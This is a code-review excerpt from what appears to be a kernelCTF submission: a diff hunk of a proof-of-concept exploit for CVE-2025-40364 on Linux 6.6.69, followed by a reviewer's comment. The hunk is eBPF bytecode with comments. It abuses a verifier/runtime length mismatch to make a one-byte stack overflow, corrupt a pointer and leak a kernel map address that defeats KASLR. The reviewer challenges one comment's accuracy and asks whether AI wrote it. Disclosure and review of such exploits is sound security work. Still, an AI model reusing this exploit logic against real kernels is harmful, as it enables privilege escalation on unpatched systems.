pocs/linux/kernelctf/CVE-2025-40364_lts_cos/exploit/lts-6.6.69/exploit.c

```diff
@@ -0,0 +1,832 @@
+    BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),          // R3 = destination buffer (start of write target on stack)
+    BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -40),        // R3 = R10 - 40 (the buffer for writing)
+    
+    // R4 = len. At runtime, R4 is 1. The instruction `BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 8)`
+    // makes `len = 1 + 8 = 9`. The verifier, however, assumes R4 is 0, so it calculates `len = 0 + 8 = 8`.
+    // This discrepancy allows a 9-byte write instead of the expected 8 bytes.
+    // The 9th byte overflows into the first byte of the value at R10 - 32.
+    BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 8),          // R4 = 9 (runtime), 8 (verifier)
+    BPF_MOV64_IMM(BPF_REG_5, 1),                   // R5 = flags (relative read from skb)
+    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),
+
+    // Validate the successful stack overflow and extract the leaked kernel address.
+    // The 9-byte write caused a 1-byte overflow into the pointer at R10 - 32.
+    // This partially corrupted pointer, when loaded into R5, is carefully crafted
+    // to point to a location that allows us to find our magic values and kernel pointers.
+    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_10, -32), // Load the *partially corrupted* pointer from R10 - 32 into R5.
+                                                     // This value is no longer `R10 - 8`.
+
+    // Check for the magic values read from the *kernel stack* using the corrupted pointer.
+    // The 1-byte overflow at R10-32 has caused R5 to point to a misaligned location
+    // relative to the original stack frame. By dereferencing R5 at specific offsets,
+    // we expect to find our magic values (0xCAFE, 0xBACA) on the kernel stack.
+    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_5, 0),    // Load value at `*(R5 + 0)` into R6. If the corruption
+                                                     // was successful, this should be 0xBACA from R10 - 16.
+    BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, -8),   // Load value at `*(R5 - 8)` into R7. If successful,
+                                                     // this should be a kernel pointer (e.g., to `array_map_ops`)
+                                                     // from an earlier stack frame.
+    
+    // Verification check: We expect the value at `*(R5 + 0)` (loaded into R6) to be `0xBACA`.
+    // This confirms that the stack overflow correctly misaligned the pointer in R10 - 32
+    // such that it now points to a location where 0xBACA resides on the kernel stack.
+    // If R6 is NOT 0xBACA, jump 12 instructions (skip leak logic - overflow failed or misaligned).
+    BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0xBACA, 12),
+    
+    // If the check passes, R7 (which holds the value from `*(R5 - 8)`) is now
+    // expected to contain a pointer to our eBPF map, or a value from which
+    // the map's kernel address (like `array_map_ops`) can be derived. This is our leak.
```

Comment:
What do you mean by
> or a value from which the map's kernel address (like `array_map_ops`) can be derived

Isn't this always the `struct bpf_array` pointer where we know that `bpf_array.map.ops` is `array_map_ops` and that's how we know the KASLR base address? But this only leaks the `struct bpf_array` pointer and you separately use the arbitrary R/W program to leak the `ops` pointer from this address, so it's not "derived", but leaked in a separate step.

Make it more clear what happens.

Was this written by AI btw?